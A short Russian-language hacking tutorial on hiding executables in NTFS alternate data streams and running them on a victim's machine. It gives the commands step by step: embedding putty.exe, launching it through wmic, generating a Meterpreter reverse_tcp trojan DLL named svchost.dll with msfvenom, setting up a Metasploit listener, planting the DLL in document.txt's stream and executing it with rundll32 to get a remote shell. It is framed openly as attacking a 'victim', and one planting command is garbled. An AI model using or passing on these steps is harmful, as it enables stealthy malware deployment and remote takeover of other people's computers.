Как известно, хакеры могут скрывать свои инструментальные средства (файлы) на томах NTFS через механизм, известный как "потоковая" передача файлов (file streaming). Когда инструментальные средства скрытые таким образом, то файлы в которых они спрятаны, не изменяются в размерах.
Выполним имплементацию файла putty.exe в файл document.txt:
type putty.exe > document.txt:test.exe
Однако спрятать просто файл это пол дела, хорошо бы еще ему сделать запуск на комьютере жертвы. Например так - запуск putty.exe из файла document.txt с помощью WMI:
wmic process call create document.txt:test.exe
Но putty.exe есть putty.exe, вполне себе безобидная утилита.
А давайте рассмотрим вариант как же создать троян svchost.dll и имплементировать его в document.txt в Kali Linux.
Выполняем в Kali Linux (192.168.1.10):
- создаем троян
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=5000 -f dll -o /var/www/html/svchost.dll
- запускаем слушатель
msf exploit(multi/handler) > resource /root/Desktop/meta_script/listener.rc
resource>use exploit/multi/handler
resource>set payload windows/meterpreter/reverse_tcp
resource>set lhost 192.168.1.10
resource>set lport 5000
resource>run
...
Выполняем на жертве имплементацию:
typeс > document.txt:svchost.dll
Выполняем запуск svchost.dll из файла document.txt с помощью Rundll32:
rundll32.exe document.txt:svchost.dll,DllMain
...
- и мы в системе (Kali Linux):
meterpreter> теперь можем танцевать по жертве.
